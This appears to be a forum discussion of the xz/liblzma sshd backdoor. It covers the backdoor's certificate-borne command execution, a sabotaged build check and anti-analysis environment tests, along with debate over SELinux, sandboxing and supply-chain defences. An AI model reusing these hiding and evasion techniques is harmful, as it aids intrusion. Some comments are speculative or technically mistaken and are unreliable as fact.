EDIT: Here's some more RE work on the matter. Has some symbol remapping information that was extracted from the prefix trie the backdoor used to hide strings. Looks like it tried to hide itself even from RE/analysis, too.
The back door pulls this from the certificate received from a remote attacker, attempts to decrypt it with ChaCha20, and if it decrypts successfully, passed to `system()`, which is essentially a simple wrapper that executes a line of shellscript under whichever user the process is currently executing.
If I'm understanding things correctly, this is worse than a public key bypass (which myself and I think a number of others presumed it might be) - a public key bypass would, in theory, only allow you access as the user you're logging in with. Assumedly, hardened SSH configurations would disallow root access.
However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
Wild. This is about as bad as a widespread RCE can realistically get.
> However, since this is an RCE in the context of e.g. an sshd process itself, this means that sshd running as root would allow the payload to itself run as root.
With the right sandboxing techniques, SELinux and mitigations could prevent the attacker from doing anything with root permissions. However, applying a sandbox to an SSH daemon effectively is very difficult.
You could refactor sshd so most network payload processing is delegated to sandboxed sub-processes. Then an RCE there has less capabilities to exploit directly. But, I think you would have to assume an RCE can cause the sub-process to produce wrong answers. So if the answers are authorization decisions, you can transitively turn those wrong answers into RCE in the normal login or remote command execution context.
But, the normal login or remote command execution is at least audited. And it might have other enforcement of which accounts or programs are permitted. A configuration disallowing root could not be bypassed by the sub-process.
You could also decide to run all user logins/commands under some more confined SE-Linux process context. Then, the actual user sessions would be sandboxed compared to the real local root user. Of course, going too far with this may interfere with the desired use cases for SSH.
That just raises the hurdle for the attacker. The attacker in this case has full control to replace any function within ssh with their own version, and the master process of sshd will always need the ability to fork and still be root on the child process before dropping privileges. I don't see any way around that. They only needed to override one function this time, but if you raise the bar they would just override more functions and still succeed.
I’m highly safety critical systems you have software (and hardware) diversity were multiple pieces of software, developed independently, have to vote on the result. Maybe highly critical pieces of Linux like the login process should be designed the same way. So that two binaries without common dependencies would need to accept the login for the user to get privileges.
Exactly how to do it (especially transparently for the user), I have no idea though. Maybe sending ssh login requests to two different sshd implementations and if they don’t do the same things (same system calls), they are both killed.
Or some kind of two step login process where the first login only gives access to the sandbox of the second login process.
But in general I assume the Linux attack surface is too big to do software diversity for all of it.
Or better, just make an ssh without any dependencies. Statically compile it, and get rid of the libssl and libsystemd and even libpam and libc's nsswitch. (I actually do this for some of my systems)
> The attacker in this case has full control to replace any function within ssh with their own version
Not true. They have this ability only for binaries that are linked to liblzma. If sshd were to be decomposed into multiple processes, not all of them would (hopefully) depend on all the libraries that the original sshd depended on.
Well, sshd doesn't depend on liblzma in the first place, but Debian and RedHat thought it would be a good idea to tie it into libsystemd for logging purposes, and patched in support. It's still pretty bad to have systemd compromised, even if ssh weren't, though. Maybe the army of pitchforks should be marching on the systemd camp. It's definitely not OpenBSD's choice of architecture, here.
It wouldn't matter in this case, since the exploit could simply rewrite the function that calls out to the unprivileged process. If you already have malicious code in your privileged parent process there's no way to recover from that.
Tell us all, please, how the starting vector of this attack would affect statically compiled dropbear binary even with systemd's libsystemd pwnage? I am very cruious about your reasoning.
The fact, that the whole reason this library is even being pulled into the sshd daemon process, is some stupid stuff like readiness notification, which itself is utterly broken on systemd, by design (and thus is forever unfixable), and makes this even more tragic.
Don't put your head into the sand, just because of the controversial nature of the topic. Systemd was VERY accommodating in this whole fiasco.
Saddest part of all this is, that we know how to to do better. At least since Bernstein, OpenBSD and supervision community (runit/s6) guys solved it. Yet somehow we see same mistakes repeated again and again.
I.e. you fork and run little helper to write, or directly write a single byte(!), to notify supervisor over supervisor provided fd. It allows you to even privseparate your notifier stuff or do all the cute SELinux magic you need.
But that would be too simple, I guess, so instead we link like 10 completely unrelated libraries into sshd, liblzma being one of them, one of the most crucial processes on the machine. To notify supervisor that it's ready. Sounds about right, linux distros (and very specific ones at that).
Sshd should be sacred, nothing more than libc and some base cryptolibs (I don't remember whether it still needs <any>ssl even) it needs.
Another great spot to break sshd is PAM, which has no place doing there either. Unfortunately it's hard dep. on most linux distros.
Maybe sshd should adopt kernel taint approach: as soon as any weird libraries (ie everything not libc and cryptolibs) are detected in sshd proces it should consider itself tainted. Maybe even seppuku itself.
The exploit could be, probably, somehow doable without systemd. But it would be much, much harder though.
Don't try to obfuscate that very fact from the discussion.
The sd-notify protocol is literally "Read socket address from environment variable, write a value to that socket". There's no need to link in libsystemd to achieve this. It's unreasonable to blame systemd for projects that choose to do so. And, in fact, upstream systemd has already changed the behaviour of libsystemd so it only dlopen()s dependencies if the consumer actually calls the relevant entry points - which would render this attack irrelevant.
> Another great spot to break sshd is PAM, which has no place doing there either. Unfortunately it's hard dep. on most linux distros.
There are many things to hate about PAM (it should clearly be a system daemon with all of the modules running out of process), but there's literally no universe where you get to claim that sshd should have nothing to do with PAM - unless you want to plug every single possible authentication mechanism into sshd upstream you're going to end up with something functionally identical.
That's an easy thing to say after the fact indeed but yes. In fact after such a disastrous backdoor I wouldn't be surprised if OpenSSH moved all code calling external libraries to unprivileged processes to make sure such an attack can never have such a dramatic effect (an auth bypass would still likely be possible, but that's still way better than a root RCE…).
At this point “All libraries could be malicious” is a threat model that must be considered for something as security critical as OpenSSH.
I don't think that's a threat model that OpenSSH should waste too much time on. Ultimately this is malicious code in the build machine compiling a critical system library. That's not reasonable to defend against.
Keep in mind that upstream didn't even link to liblzma. Debian patched it to do so. OpenSSH should defend against that too?
any one of us if we sat on the OSSH team would flip the middle finger. What code is the project supposed to write when nothing on main dyn loaded liblzma. It was brought in from a patch they don't have realistic control over.
This is a Linux problem, and the problem is systemd, which is who brought the lib into memory and init'd it.
I think the criticisms of systemd are valid but also tangential. I think Poettering himself is on one of the HN threads saying they didn't need to link to his library to accomplish what they sought to do. Lzma is also linked into a bunch of other critical stuff, including but not limited to distro package managers and the kernel itself, so if they didn't have sshd to compromise, they could have chosen another target.
So no, as Pottering claimed, sshd would not be hit by this bug except for this systemd integration.
I really don't care about "Oh, someone could have written another compromise!". What allowed for this compromise, was a direct inability for systemd to reliable do its job as an init system, necessitating a patch.
And Redhat, Fedora, Debian, Ubuntu, and endless other distros took this route, because something was required, and here we are. Something that would not be required if systemd could actually perform its job as an init system without endless work arounds.
Also see my other reply in this thread, re Redhat's patch.
I just went and read https://bugzilla.redhat.com/show_bug.cgi?id=1381997 and actually seems to me that sshd behavior is wrong, here. I agree with the S6 school of thought, i.e. that PID files are an abomination and that there should always be a chain of supervision. systemd is capable of doing that just fine. The described sshd behavior (re-execing in the existing daemon and then forking) can only work on a dumb init system that doesn't track child processes. PID files are always a race condition and should never be part of any service detection.
That said, there are dozens of ways to fix this and it really seems like RedHat chose the worst one. They could have patched sshd in the other various ways listed in that ticket, or even just patch it to exit on SIGHUP and let systemd re-launch it.
I'm not the type to go out of my way to defend systemd and their design choices. I'm just saying the severity of this scenario of a tainted library transcends some of the legit design criticisms. If you can trojan liblzma you can probably do some serious damage without systemd or sshd.
Of course you can trojan other ways, but that can only be said, in this thread, in defense of systemd.
After all, what you're saying is and has always been the case! It's like saying "Well, Ford had a design flaw in this Pinto, and sure 20 people died, but... like, cars have design flaws from time to time, so an accident like this would've happened eventually anyhow! Oh well!"
It doesn't jive in this context.
Directly speaking to this point, patched ssh was chosen for a reason. It was the lowest hanging fruit, with the greatest reward. Your speculation about other targets isn't unwarranted, but at the same time, entirely unvalidated.
Why to avoid this? Well, it is adding more systemd-specific bits and new build dependency to something that always worked well under other inits without any problems for years.
They chose the worst solution to a problem that had multiple better solutions because of a pre-existing patch was the easiest path forward. That’s exactly what I’m talking about.
It is possible to prevent libraries from patching functions in other libraries; make those VM regions unwritable, don't let anyone make them writable, and adopt PAC or similar hardware protection so the kernel can't overwrite them either.
That's already done, but in this case the attack happened in a glibc ifunc and those run before the patching protection is enabled (since an ifunc has to patch the PLT).
Sounds like libraries should only get to patch themselves.
(Some difficulty with this one though. For instance you probably have to ban running arbitrary code at load time, but you should do this anyway because it will stop people from writing C++.)
If you're running in the binary you can call mprotect(2), and even if that is blocked you can cause all kinds of mischief. The original motivation for rings of protection on i286 was so that libraries could run in a different ring from the binary (usually library in ring 2 and program in ring 3), using a call gate (a very controlled type of call) to dispatch calls from the binary to the library, which stops the binary from modifying the library and IIRC libraries from touching each other. But x86-64 got rid of the middle rings.
> If you're running in the binary you can call mprotect(2)
Darwin doesn't let you make library regions writable after dyld is finished with them. (Especially iOS where codesigning also prevents almost all other ways to get around this.)
Something like OpenBSD pledge() can also revoke access to it in general.
> But x86-64 got rid of the middle rings.
x86 is a particularly insecure architecture but there's no need for things to be that way. That's why I mentioned PAC, which prevents other processes (including the kernel) from forging pointers even if they can write to another process's memory.
Because it's a general purpose computer. Duh. The aim is to be able to arbitrary computations. Which overwriting crypto functions in sshd is a valid computation to be considered.
I don't think you should connect your general purpose computer to the internet then. Or keep any valuable data on it. Otherwise other people are going to get to perform computations on it.
You can definitely prevent a lot of file/executable accesses via SELinux by running sshd in the default sshd_t or even customizing your own sshd domain and preventing sshd from being able to run binaries in its own domain without a transition. What you cannot prevent though is certain things that sshd _requires_ to function like certain capabilities and networking access.
by default sshd has access to all files in /home/$user/.ssh/, but that could be prevented by giving private keys a new unique file context, etc.
SELinux would not prevent all attacks, but it can mitigate quite a few as part of a larger security posture
libselinux is the userspace tooling for selinux, it is irrelevant to this specific discussion as the backdoor does not target selinux in any way, and sshd does not have the capabilities required to make use of the libselinux tooling anyway
libselinux is just an unwitting vector to link liblzma with openssh
Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc. However, you could only really sandbox sshd-as-root. In order for sshd to do its job, it does need to be able to masquerade as arbitrary non-root users. That's still pretty bad but generally not "undetectably alter the operating system or firmware" bad.
>Even though sshd must run as root (in the usual case), it doesn't need unfettered access to kernel memory, most of the filesystem, most other processes, etc
This is sort of overlooking the problem. While true, the processes spawned by sshd do need to be able to do all these things and so even if you did sandbox it, preserving functionality would all but guarantee an escape is trivial (...just spawn bash?).
SELinux context is passed down to child processes. If sshd is running as confined root (system_u:system_r:sshd_t or similar), then the bash spawned by RCE will be too. Even if sshd is allowed to masquerade as an unconfined non-root user, that user will (regardless of SELinux) be unable to read or write /dev/kmem, ignore standard file permissions, etc.
That's my point though--users expect to be able to do those things over ssh. Sandboxing sshd is hard because its child processes are expected to be able to do anything that an admin sitting at the console could do, up to and including reading/writing kernel memory.
I'm assuming SSH root login is disabled and sudo requires separate authentication to elevate, but yeah, if there's a way to elevate yourself to unconfined root trivially after logging in, this doesn't buy you anything.
Now, sandboxing sudo (in the general case) with SELinux probably isn't possible.
This does not matter either. The attack came in by loading into systemd via liblzma. It put on a hook and then sits around waiting for sshd to load in so it can learn the symbols then proceeds to swap in the jumps.
sshd is a sitting duck. Bifurcating sshd into a multimodule scheme won't work because some part of it still has to be loaded by systemd.
This is a web of trust issue. In the .NET world where refection attacks happen to commercial software that features dynload assemblies, the only solution they could come up with is to sign all the things, then box up anything that doesn't have a signing mechanism and then sign that, even signing plain old zip files.
Some day we will all have to have keys, and to keep the anon people from leaving they can get an anon key, but anons with keys will never get on the chain where the big distros would ever trust their commits until someone who forked over their passport and photos got a trustable key to sign off on the commits, so that the distro builders can then greenlight pulling it in.
Then I guess to keep the anons hopeful that they are still in the SDLC somewhere their commits can go into the completely untrusted-unstable-crazytown release that no instutution in their right mind would ever lay down in production.
I’ll admit to not being an expert in SELinux, but it seems like an impossibly leaky proposition. Root can modify systemd startup files, so just do that in a malicious way and reboot the system. that context won’t be propagated. And if you somehow prohibit root from doing that by SELinux policy then you end up with a system that can’t actually be administered.
[edit: sibling sweetjuly said it better than I could. I doubt that this much more than a fig leaf on any real world system given what sshd is required to have to do.]
Selinux domains are uncoupled from Linux users. If sshd does not have Selinux permissions to edit those files it will simply be denied. Even if sshd is run as root
Which amounts to the un-administerable system I mentioned. If it’s not possible to modify systemd config files using ssh, what happens when you need to edit them?
Really what they're proposing here is a non-modifiable system, where the root is read-only and no user can modify anything important.
Which is nice and all, but that implies a "parent" system that creates and deploys those systems. Which people likely want remote access to.. Probably by sshd...
You can limit the exposure of the system from RCE in sshd with SELinux without preventing legitimate users from administering the system.
Granted that SELinux is overly complicated and has some questionable design decisions from a usability standpoint but it's not as limited or inflexible as many seem to think.
It really can stop a system service running as "root" from doing things a real administrator doesn't want it to do. You can couple it with other mechanisms to achieve defense in depth. While any system is only as strong as its weakest link, you can use SELinux to harden sshd so even with exploits in the wild it's not the weakest link vis-a-vis an attacker getting full unconfined root access. This may or may not be worth your time depending on what that box is doing and how connected to the rest of your infrastructure it is.
There seems to be a pervasive misunderstanding of the difference between standard UNIX/Linux discretionary access control and SELinux-style mandatory access control. The latter cannot be fooled into acting as a confused deputy anywhere near as easily as the former. The quality of the SELinux policy on a particular system plays a big part in how effective it is in practice but a good policy will be far harder to circumvent than anything the conventional permissions model is capable of.
Moreover, while immutability is obviously an even stronger level of protection, it is not necessary to make the system immutable to accomplish what I've described here while still allowing legitimately and separately authenticated users to fully administer the system.
Most people turn SELinux off anyway, so they have no clue how it operates.
DACs (discretionary, unix perms) are DACs and MACs (mandatory, SELinux) are MACs. They are mandatory - it's in their name.
Think of SELinux as completely orthogonal access control system, that can overturn any DAC decision, which it in fact does. SELinux language is much more featured than DAC language, it can express domain transitions.
Nobody here has inspected the sshd_t policies but I believe exec transition should be forbidden for arbitrary binaries (I hope).
That should in essence thwart arbitrary exec from remote key payload.
If actual shellcode would be sent though (e.g. doing filesystem open/write/close), that is a little bit different.
It's possible to spawn a sshd as an unprivileged or partially-capabilitized process. Such as sandbox isn't the default deployment, but it's done often enough and would work as designed to prevent privilege elevation above the sshd process.
SELinux does not rely on the usual UID/GID to determine what a process can do. System services, even when running as "root", are running as confined users in SELinux. Confined root cannot do anything which SELinux policy does not allow it to do. This means you can let sshd create new sessions for non-root users while still blocking it from doing the other things which unconfined root would be able to do. This is still a lot of power but it's not the godlike access which a person logged in as (unconfined) root has.
Doesn't matter. A malicious sshd able to run commands arbitrary users can just run malicious commands as those users.
We'd need something more like a cryptographically attested setreuid() and execve() combination that would run only commands signed with the private key of the intended user. You'd want to use a shared clock or something to protect against replay attacks
Yes, this won't directly protect against an attacker whose goal is to create a botnet, mine some crypto on your dime, etc. However, it will protect against corruption of the O/S itself and, in tandem with other controls, can limit the abilities an attacker has, and ensure things like auditing are still enforced (which can be tied to monitoring, and also used for forensics).
Whether it's worth it or not depends on circumstances. In many cloud environments, nuking the VM instance and starting over is probably easier than fiddling with SELinux.
even easier is to STOP HOSTING SSHD ON IPV4 ON CLEARNET
at minimum, ipv6 only if you absolutely must do it (it absolutely cuts the scans way down)
better is to only host it on vpn
even better is to only activate it with a portknocker, over vpn
even better-better is to set up a private ipv6 peer-to-peer cloud and socat/relay to the private ipv6 network (yggdrasil comes to mind, but there's other solutions to darknet)
your sshd you need for server maintenance/scp/git/rsync should never be hosted on ipv4 clearnet where a chinese bot will find it 3 secs after the route is established after boot.
How about making ssh as secure as (or more secure than) the VPN you'd put it behind? Considering the amount of vulnerabilities in corporate VPNs, I'd even put my money on OpenSSH today.
It's not like this is SSH's fault anyway, a supply chain attack could just as well backdoor some Fortinet appliance.
Defence in depth. Which of your layers is "more secure" isn't important if none are "perfectly secure", so having an extra (independent) layer such as a VPN is a very good idea.
You have to decide when to stop stacking, otherwise you'd end up gating access behind multiple VPNs (and actually increasing your susceptibility to hypothetical supply-chain attacks that directly include a RAT).
I'd stop at SSH, since I don't see a conceptual difference to how a VPN handles security (unless you also need to internally expose other ports).
OpenSSH has a much smaller attack surface, is thoroughly vetted by the best brains on the planet, and is privilege separated and sandboxed. What VPN software comes even close to that?
The only software remotely in the same league is a stripped down Wireguard. There is a reason the attacker decided to attack liblzma instead of OpenSSH.
I imagine it stops some non-targeted attempts that simply probe the entire v4 range, which is not feasible with v6. But yeah, not really buying you much, especially if there is any publicly listed service on that IP.
If you have password authentication disabled then it shouldn't matter how many thousands of times a day people are scanning and probing sshd. Port knockers, fail2ban, and things of that nature are just security by obscurity that don't materially increase your security posture. If sshd is written correctly and securely it doesn't matter if people are trying to probe your system, if it's not written correctly and securely you're SOL no matter what.
Plausibly by having set-user-ID capability but not others an attacker might need.
But in the more common case it just doesn't: you have an sshd running on a dedicated port for the sole purpose of running some service or another under a specific sandboxed UID. That's basically the github business model, for example.
I need full filesystem access, VIM, ls, cd, grep, awk, df, du at the very least. Sometimes perl, find, ncdu, and other utilities are necessary as well. Are you suggesting that each tool have its own SSH process wrapping it?
Maybe write a shell to coordinate between them? It should support piping and output redirection, please.
Sigh. I'm not saying there's a sandboxed sshd setup that has equivalent functionality to the default one in your distro. I'm not even saying that there's one appropriate for your app.
I'm saying, as a response to the point above, that sandboxing sshd is absolutely a valid defense-in-depth technique for privilege isolation, that it would work against attacks like this one to prevent whole-system exploitation, and that it's very commonly deployed in practice (c.f. running a git/ssh server a-la github).
Git’s use of the ssh protocol as a transport is a niche use case that ignores the actual problem. No one is seriously arguing that you can’t sandbox that constrained scenario but it’s not really relevant since it’s not the main purpose of the secure shell daemon.
It's part of a test program used for feature detection (of a sandboxing functionality), and causes a syntax error. That in turn causes the test program to fail to compile, which makes the configure script assume that the sandboxing function is unavailable, and disables support for it.
You are looking at a makefile, not C. The C code is in a string that is being passed to a function called `check_c_source_compiles()`, and this dot makes that code not compile when it should have -- which sets a boolean incorrectly, which presumably makes the build do something it should not do.
This is something that should have unit/integration tests inside the tooling itself, yeah. If your assertion is that X function is called / in the environment X then the function should return Y then that should be a test especially when it’s load-bearing for security.
And tooling is no exception either. You should have tests that your tooling does the things it says on the tin and that things happen when flags are set and things don’t happen when they’re not set, and that the tooling sets the flags in the way you expect.
These aren’t even controversial statements in the JVM world etc. Just C tooling is largely still living in the 70s apart from abortive attempts to build the jenga tower even taller like autotools/autoconf/cmake/etc (incomprehensible, may god have mercy on your build). At least hand written make files are comprehensible tbh.
As far as I can tell, the check is to see if a certain program compiles, and if so, disable something. The dot makes it so that it always fails to compile and thus always disables that something.
> if a certain program compiles, and if so, disable something.
Tiny correction: [...] enable something.
The idea is: If that certain program does not compile it is because something is not available on the system and therefore needs to be disabled.
That dot undermines that logic. The program fails because of a syntax error caused by the dot and not because something is missing.
It is easy to overlook because that dot is tiny and there are many such tests.
I had a similar problem with unit testing of a library. Expected failures need to be tested as well. As an example imagine writing a matrix inversion library. Then you need to verify that you get something like a division by zero error if you invert the zero matrix. You write a unit test for that and by mistake you insert a syntax error. Then you run the unit test and it fails as expected but not in the correct way.
It's subtle. It fails as expected but it fails because of unexpected wrong causes.
The desire for "does this compile on this platform" checks comes from an era where there was pretty much no way to check the error. Somebody runs it on HP-UX with the "HP-UX Ansi C Compiler" they licensed from HP and the error it spits out isn't going to look like anything you recognize.
That one's a separate attack vector, which is seemingly unused in the sshd attack. It only disables sandboxing of the xzdec(2) utility, which is not used in the sshd attack.
I guess xzdec was supposed to sandbox itself where possible so they disabled the sandbox feature check in the build system so that future payload exploits passed to xzdec wouldn’t have to escape the sandbox in order to do anything useful?
Yes, but don't forget that there are different kinds of sandboxes. SELinux never needs the cooperation of any program running on the system in order to correctly sandbox things. No change to Xz could ever make SELinux less effective.
But don't forget that xz is also used as part of dpkg for unpacking packages.
The whole purpose of dpkg is to update critical system packages. Any SELinux policy that protects from a backdoored dpkg/xz installing a rootkit during the next kernel security update; will also prevent installing real kernel security updates.
The particular way of attack in this OpenSSH backdoor can maybe be prevented; but we've got to realize that the attacker already had full root permissions and there's no way of protecting from that.
SELinux policies are much more subtle than that. You don’t restrict what xz or liblzma can do, you restrict what the whole process can do. That process is either sshd or dpkg, and you can give them completely different access to the system, so that if dpkg tries to launch an interactive shell it fails, while sshd fails if it tries to overwrite a system file such as /bin/login or whatever. Neither would ordinarily do that, but the payload delivered via the back door might attempt it and wouldn’t succeed. And you would get a report stating what had happened, so if you’re paying attention the back door starts to become obvious.
Also I think dpkg switched to Zstd, didn’t it? Or am I misremembering?
But you’re not wrong; ultimately both sshd and dpkg are critical infrastructure. SELinux can prevent them from doing completely wrong things, but obviously it wouldn’t be useful for it to prevent them from doing their jobs. And those jobs are security critical already. SELinux is not a panacea, merely defense in depth.
But that's a check for a Linux feature. So the more interesting question would be, what in the Linux world might be building xz-utils with cmake, I guess using ExternalProject_Add or something similar.
sshd is probably the softest target on most systems. It is generally expected (and setup by default) so that people can gain a root shell that provides unrestricted access.
sshd.service will typically score 9.6/10 for "systemd-analyze security sshd.service" where 10 is the worst score. When systemd starts a process, it does so by using systemd-nspawn to setup a (usually) restricted namespace and apply seccomp filters before the process is then executed. seccomp filters are inherited by child processes, which can then only further restrict privileges but not expand upon the inherited privileges. openssh-portable on Linux does apply seccomp filters to child processes but this is useless in this attack scenario because sshd is backdoored by the xz library, and the backdoored library can just disable/change those seccomp filters before sshd is executed.
sshd is particularly challenging to sandbox because if you were to restrict the namespace and apply strict seccomp filters via systemd-nspawn, a user gaining a root shell via sshd (or wanting to sudo/su as root) is then perhaps prevented from remotely debugging applications, accessing certain filesystems, interacting with network interfaces, etc depending on what level of sandboxing is applied from systemd-nspawn. This choice is highly user dependent and there are probably only limited sane defaults for someone who has already decided they want to use sshd. For example, sane defaults could include creating dedicated services with sandboxing tailored just for read-only sftp user filesystem access, a separate service for read/write sftp user filesystem access, sshd tunneling, unprivileged remote shell access, etc.
Doesn't matter. This is a supply chain attack, not a vulnerability arising from a bug. All sandboxing the certificate parsing code would have done is make the author of the backdoor do a little bit more work to hijack the necessarily un-sandboxed supervisor process.
Applying the usual exploit mitigations to supply chain attacks won't do much good.
What will? Kill distribution tarballs. Make every binary bit for bit reproducible from a known git hash. Minimize dependencies. Run whole programs with minimal privileges.
Oh, and finally support SHA2 in git to forever forestall some kind of preimage attack against a git commit hash.
... and stop adding random patches to upstream software, especially when we're talking about security-critical stuff that must absolutely not be released without a very thorough security review.
Right, though if I'm understanding correctly, this is targeting openssl, not just sshd. So there's a larger set of circumstances where this could have been exploited. I'm not sure if it's yet been confirmed that this is confined only to sshd.
The exploit, as currently found, seems to target OpenSSH specifically. It's possible that everything involving xz has been compromised, but I haven't read any reports that there is a path to malware execution outside of OpenSSH.
> Initially starting sshd outside of systemd did not show the slowdown, despite the backdoor briefly getting invoked. This appears to be part of some countermeasures to make analysis harder.
> a) TERM environment variable is not set
> b) argv[0] needs to be /usr/sbin/sshd
> c) LD_DEBUG, LD_PROFILE are not set
> d) LANG needs to be set
> e) Some debugging environments, like rr, appear to be detected. Plain gdb appears to be detected in some situations, but not others
Would that help? sshd, by design, opens shells. the backdoor payload was basically to open a shell. that is, the very thing that sshd has to do.
The pledge/unvail system is pretty great, but my understanding is that it do not do anything that the linux equivalent interfaces(seccomp i think) cannot do. It is just a simplified/saner interface to the same problem of "how can a program notify the kernel what it's scope is?" The main advantage to pledge/unveil bring to the table is that they are easy to use and cannot be turned off, optional security isn't.
By design, OpenSSH will start an interactive shell with either the capabilities to escalate to root or direct root permissions. I don't think pledge/unveil will work any better than seccomp already does.
I do like the pledge/unveil API, but I don't think it would've made much of a difference.
There's a reasonably high chance this was to target a specific machine, or perhaps a specific organization's set of machines. After that it could probably be sold off once whatever they were using it for was finished.
I doubt we'll ever know the intention unless the ABC's throw us a bone and tell us the results of their investigation (assuming they're not the ones behind it).
Classic example of this being Stuxnet, a worm that exploited four(!) different 0-days and infected hundreds of thousands of computers with the ultimate goal of destroying centrifuges associated with Iran’s nuclear program.
Government organizations have many different teams. One might develop vulnerabilities while another runs operations with oversight for approving use of exploits and picking targets. Think bureaucracy with different project teams and some multi-layered management coordinating strategy at some level.
There aren’t a billion computers running ssh servers and the ones that do should not be exposed to the general internet. This is a stark reminder of why defense in depth matters.
One have question on this is, if the backdoor would not been discovered due to performance issue (which was as I understood it purely an oversight/fixable deficiency in the code), what are the chances of discovering this backdoor later, or are there tools that would have picked it up? Those questions are IMO relevant to understand if this kind of backdoor is the first one of the kind, or the first one that was uncovered.
Working for about a year in an environment that was exposed to high volume of malevolent IT actors (and some pretty scary ones) I’d say: discovery chances very always pretty high.
Keeping veil of secrecy requires unimaginable amount of energy. Same goes with truth consistency. One little slip and everything goes to nothing. Sometimes single sentence can start a chain of reaction and uncover meticulous crafted plan.
That’s how crime if fought every day. Whereas police work has limited resources, software is analyzed daily by hobbyists as a hobby, professionals who still do it for a hobby, and professionals for professional reasons.
Discovery was bound to happen eventually.
XZ attack was very well executed. It’s a master piece. I wouldn’t be surprised if some state agencies would be involved. But it also was incredibly lucky. I know for sure for myself, but also many of my colleagues would go into long journey if found any of issues that are flagged right now.
One takeaway is that chance of finding such issue would be impossible if xz/liblzma wouldn’t be open source (and yes I am also aware it enabled it in the first place) but imagine this existing in Windows or MacOS.
I bet in the majority of cases, there's no need to pressure for merging.
In a big company it's much easier to slip it in. Code seemingly less relevant for security is often not reviewed by a lot of people. Also, often people don't really care and just sign it off without a closer look.
And when it's merged, no one will ever look at it again, other than with FOSS.
An insider could just be tasked to look for exploitable vulnerabilities in existing code and compile this information for outside entities without ever having to risk inserting a purpose-made backdoor. Considering the security state of most large codebases, there would be a bottomless well of them.
I've read about workplaces that were compromised with multiple people - they would hire a compromised manager, who would then install one or two developers, and shape the environment for them to prevent discovery, which would make these kind of exploits trivial.
Another independent maintainer would have helped too. Many eyes make bugs shallow, but just one extra genuine maintainer would have helped enormously. Clearly the existing maintainer trusted the attacker completely, but a second maintainer would not have. That's another social dimension to this attack: doing enough real work to suppress other maintainers coming along.
If the exploit wasn't baing used, the odds would would be pretty low. They picked the right place to bury it (i.e., effectively outside the codebase, where no auditor ever looks).
That said, if you're not using it, it defeats the purpose. And the more you're using it, the higher the likelihood you will be detected down the line. Compare to Solarwinds.
There is no ‘system()’ syscall, and fork/exec would be extremely common for opensshd — it’s what it does to spawn new shells which go on to do anything.
I’m not arguing with the point, but this is a great place to hide — very difficult to have meaningful detection rules even for a sophisticated sysadmin.
It’s true that there’s a precise set of circumstances that would be different for the RCE (the lack of a PAM dance prior, same process group & session, no allocation of a pseudo-terminal, etc.). My point was merely that I don’t think they are commonly encoded in rule sets or detection systems.
It’s certainly possible, but my guess is sshd is likely to have a lot of open policy. I’m really curious if someone knows different and there are hard detection for those things. (Either way, I bet there will be in the future!)
I am trying to figure out if auditctl is expressive enough to catch unexpected execve() from sshd: basically anything other than /usr/bin/sshd (for privsep) executed with auid=-1 should be suspicious.
With sufficient data points, you can do A/B and see that all affected systems run a specific version of Linux distro, and eventually track it down to a particular package.
Unless you're the bad actor, you have no way to trigger the exploit, so you can't really do an a/b test. You can only confirm which versions of which distros are vulnerable. And that assumes you have sufficient instrumentation in place to know the exploit has been triggered.
Even then, who actually has a massive fleet of publicly exposed servers all running a mix of distros/versions? You might run a small handful of distros, but I suspect anyone running a fleet large enough to actually collect a substantial amount of data probably also has tools to upgrade the whole fleet (or at least large swaths) in one go. Certainly there are companies where updates are the wild west, but the odds that they're all accessible to and controllable by a single motivated individual who can detect the exploit is essentially zero.
Those connection attempts wouldn't ever reach the daemon though, let alone get to preauth. So how would an exploitation attempt even be distinguishable from, say, a harmless random password guess if neither ever gets to see the daemon?
> That said, if you're not using it, it defeats the purpose.
Not if this was injected by a state actor. My experience with other examples of state actor interference in critical infrastructure, is that the exploit is not used. It’s there as a capability to be leveraged only in the context of military action.
Why do non-friendly state actors (apparently) not detect and eliminate exploits like this one?
Supposedly, they should have the same kind of budgets for code review (or even more, if we combine all budgets of all non-friendly state actors, given the fact that we are talking about open-source code).
When a state actor says "We found this exploit", people will get paranoid and wondering if the fix is actually an exploit.
Not saying it happened in this case, but it's really easy for a state actor to hide an extensive audit behind some parallel construction. Just create a cover story pretending to be a random user who randomly noticed ssh logins being slow, and use that story to point maintainers to the problem, without triggering anyone's paranoia, or giving other state actors evidence of your auditing capabilities.
If a government is competent enough to detect this, they're competent enough to add it to their very own cyberweapon stockpile.
They wouldn't be able to do that for this particular exploit since it requires successfully decrypting data encrypted by the attacker's secret key. A zero day caused by an accidental bug though? There's no reason for them to eliminate the threat by disclosing it. They can patch their own systems and add yet another exploit to their hoard.
"Their own systems" will necessarily include lots of civilian infrastructure. Hard to make sure all that gets patched without issuing a CVE, let alone without anyone in the general public even being aware of the patch.
> That said, if you're not using it, it defeats the purpose.
Not always. Weapons of war are most useful when you don't have to actually use them, because others know that you have it. This exploit could be used sparingly to boost a reputation of a state-level actor. Of course, other parties wouldn't know about this particular exploit, but they would see your cyber capabilities in the rare occasions where you decided to use it.
Hmmh, brings up the question, if no exploit actually occurred, was a crime committed? Can't the authors claim that they were testing how quickly the community of a thousand eyes would react, you know, for science?
That's like asking if someone that went into a crowded place with a full-automatic and started shooting at people but "purposefully missing" is just testing how fast law enforcement reacts, you know, for science.
After something like 2 years of planning this out and targeted changes this isn't something "just done for science".
It’s more analogous to getting hired at the lock company and sabotaging the locks you assemble to be trivially pickible if you know the right trick.
The University of Minnesota case is an interesting one to compare to. I could imagine them being criminally liable but being given a lenient punishment. I wonder if the law will end up being amended to better cover this, if it isn’t already explicitly illegal.
I think behavioral analysis could be promising. There's a lot of weird stuff this code does on startup that any reasonable Debian package on the average install should not be doing in a million years.
Games and proprietary software will sometimes ship with DRM protection layers that do insane things in the name of obfuscation, making it hard to distinguish from malware.
But (with only a couple exceptions) there's no reason for a binary or library in a Debian package to ever try to write the PLT outside of the normal mechanism, to try to overwrite symbols in other modules, to add LD audit hooks on startup, to try to resolve things manually by walking ELF structures, to do anti-debug tricks, or just to have any kind of obfuscation or packing that free software packaged for a distro is not supposed to have.
Some of these may be (much) more difficult to detect than others, some might not be realistic. But there are several plausible different ways a scanner could have detected something weird going on in memory during ssh startup.
No one wants a Linux antivirus. But I think everyone would benefit from throwing all the behavioral analysis we can come up with at new Debian package uploads. We're very lucky someone noticed this one, we may not have the same luck next time.
